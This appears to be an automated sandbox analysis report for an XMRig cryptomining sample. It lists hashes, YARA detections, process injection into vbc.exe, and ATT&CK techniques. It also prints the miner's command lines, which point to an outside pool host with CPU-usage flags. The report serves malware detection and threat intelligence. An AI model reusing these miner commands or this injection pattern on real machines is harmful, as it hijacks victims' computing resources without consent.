xmrig | 9931ed9a4ecdbd530f9521963fd398b5e75db27b008bf23ca3d6533eeb71a9ac

General

Target

a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe
Size

500KB
MD5

a5c4e5a50eb533016e2533067cb48bc5
SHA1

ed14201aa8df5130bf9122800bfe9fe5879129a1
SHA256

9931ed9a4ecdbd530f9521963fd398b5e75db27b008bf23ca3d6533eeb71a9ac
SHA512

6e49e956a08b656af8b9c90bf1711cc1e8187f2253e8db88a60c346e54f596c4b9a70ad6d38c16bafa1a1aef1ba8066b7d4761d92a810c5f1b20a6d6b8f319a0
SSDEEP

12288:AYtvrXl1DEr9/627p+uWxNkNg3NRK3lgpCQUAhv:86+wuWxa63O3lgpJhv

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2764-41-0x0000000000400000-0x0000000000529000-memory.dmp	xmrig

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2424-29-0x0000000000400000-0x0000000000529000-memory.dmp	upx
behavioral1/memory/2424-26-0x0000000000400000-0x0000000000529000-memory.dmp	upx
behavioral1/memory/2424-24-0x0000000000400000-0x0000000000529000-memory.dmp	upx
behavioral1/memory/2424-22-0x0000000000400000-0x0000000000529000-memory.dmp	upx
behavioral1/memory/2764-40-0x0000000000400000-0x0000000000529000-memory.dmp	upx
behavioral1/memory/2764-41-0x0000000000400000-0x0000000000529000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 2 IoCs

Processes:

a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe

description	pid	process	target process
PID 2336 set thread context of 2424	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 set thread context of 2764	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe

pid process

2336 a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe
2336 a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe

pid	process
2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe
2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe
Token: SeLockMemoryPrivilege	2764	vbc.exe
Token: SeLockMemoryPrivilege	2764	vbc.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.execsc.exe

description	pid	process	target process
PID 2336 wrote to memory of 2408	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	csc.exe
PID 2336 wrote to memory of 2408	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	csc.exe
PID 2336 wrote to memory of 2408	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	csc.exe
PID 2408 wrote to memory of 2932	2408	csc.exe	cvtres.exe
PID 2408 wrote to memory of 2932	2408	csc.exe	cvtres.exe
PID 2408 wrote to memory of 2932	2408	csc.exe	cvtres.exe
PID 2336 wrote to memory of 2424	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2424	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2424	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2424	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2424	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2424	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2424	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2424	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2764	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2764	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2764	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2764	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2764	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2764	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2764	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe
PID 2336 wrote to memory of 2764	2336	a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.cmdline"
2⤵
- Suspicious use of WriteProcessMemory
PID:2408

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D60.tmp" "c:\Users\Admin\AppData\Local\Temp\fz5p5nzm\CSC626E9D94D2784E3A9660938EA453D8EA.TMP"
3⤵
PID:2932

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
-o relay.100chickens.me:8000 --max-cpu-usage 15 -u 1 -p x -k -a cryptonight --variant="-1"
2⤵
PID:2424

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
-o relay.100chickens.me:8000 --max-cpu-usage 99 -u 1 -p x -k -a cryptonight --variant="-1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2764

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scripting

1

T1064

Persistence

Privilege Escalation

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES1D60.tmp
Filesize
1KB

MD5
bdef930111b15e12857483bd5a0e2421

SHA1
ad0d48c080133d6dc8d8325da9d8345a06e36a64

SHA256
aeb6dbec3e7ec80486f8de02afab121a53be2be3bcfc5fa9f0b0ed68b3bea1b9

SHA512
5cac5e679141cafcf9267577c10ad90fb379ebde472ee448097f7e00f67bb3bf542937bf99c8ad97234389fbe5ab5a9d567e403d12f1f4c2e408c9b0e91a8d48

Download Submit
C:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.dll
Filesize
6KB

MD5
8ff7b5b35765b4bd1135a9b17e13fcb6

SHA1
697a30a1fa69e653ebd33f3af2799e623f5bbdc0

SHA256
de31b0e4c39a4e1bf8002bad0b9db2d07f540d110bc90ab384b497960112c65c

SHA512
e522e4876cc6ba949ca7d91b67b906adaa1d771bc22c9cc12a84aa4208a03288515fbb3b2f4c65062de1d2fc0489d1944fca4a2f9c13a112e59401797364fc5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.pdb
Filesize
15KB

MD5
f956b429d574edd92d5daa75ccfe3e0e

SHA1
81341532110c4f75cbd7cccf684cea11bade5bf7

SHA256
683d8a0bce053409826f3312d638905451c8dab49112dbba67f0784b2ab12bd3

SHA512
7750f290359d0736e877ba2857c6ab8158e29cd6ab514b3afe10dd57881cc203c00a02650df79495e744f109ad983f93e2ca9d6198b6ed4e67230f8603f3172c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fz5p5nzm\CSC626E9D94D2784E3A9660938EA453D8EA.TMP
Filesize
1KB

MD5
f4a08c1e8d85cbc7aea7d8dc1b5a01f8

SHA1
5613ca5774bca147b9af27cfea0b8e9b6e79b2dd

SHA256
e55a535ce8ef7a8b3497b78fbdb2c10d103e24fdbdd021bb38fef925e427ace2

SHA512
a4ed1a5205f873ed8c88bffa999ced81b1bd69a1c75c27ce84562e038b2468e4fcea332d3d971efec8958209771e1fb10afa25f50dab3b9e926da4892a2f82c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.0.cs
Filesize
2KB

MD5
5948bce18180803e60088f2616225169

SHA1
0e992166427f0a8bce3849d9a3168c25f0733996

SHA256
d14f42c88c197dfa3d124b22280971ba819531752ef659ed2dd81e034082519a

SHA512
696fa5c75209a368ab5204f08c98140977360285849bd38eadb4db6e954d59291e0c36417afe84b129e8bbead6c4a1228a4dd70ec2eb0613d7f400496bfb049c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.cmdline
Filesize
312B

MD5
0f2e86c4e85c03d26d50bcb03356d5e2

SHA1
c5a4aa25bcc1adf991026db294b51086ef25e0c8

SHA256
7a8576fc55879e99d59c8342a7d2fc4950cb8053cd6b2b4a8b61fc03f7db64d1

SHA512
7866896835c52b356ed05d02c8a5cbf816d977e864c12335b8c8d882a1438f08820a0552a199600626a051f8daa50410f6f2f89295063ccd71a661486127251e

Download Submit
memory/2336-19-0x0000000002100000-0x0000000002184000-memory.dmp

Filesize
528KB

Download
memory/2336-7-0x000007FEF58B0000-0x000007FEF629C000-memory.dmp

Filesize
9.9MB

Download
memory/2336-1-0x0000000000920000-0x00000000009A2000-memory.dmp

Filesize
520KB

Download
memory/2336-17-0x0000000000160000-0x0000000000168000-memory.dmp

Filesize
32KB

Download
memory/2336-0-0x000007FEF58B3000-0x000007FEF58B4000-memory.dmp

Filesize
4KB

Download
memory/2336-42-0x000007FEF58B0000-0x000007FEF629C000-memory.dmp

Filesize
9.9MB

Download
memory/2424-26-0x0000000000400000-0x0000000000529000-memory.dmp

Filesize
1.2MB

Download
memory/2424-29-0x0000000000400000-0x0000000000529000-memory.dmp

Filesize
1.2MB

Download
memory/2424-24-0x0000000000400000-0x0000000000529000-memory.dmp

Filesize
1.2MB

Download
memory/2424-22-0x0000000000400000-0x0000000000529000-memory.dmp

Filesize
1.2MB

Download
memory/2424-20-0x0000000000400000-0x0000000000529000-memory.dmp

Filesize
1.2MB

Download
memory/2424-27-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

Filesize
4KB

Download
memory/2764-38-0x000007FFFFFDA000-0x000007FFFFFDB000-memory.dmp

Filesize
4KB

Download
memory/2764-40-0x0000000000400000-0x0000000000529000-memory.dmp

Filesize
1.2MB

Download
memory/2764-41-0x0000000000400000-0x0000000000529000-memory.dmp

Filesize
1.2MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads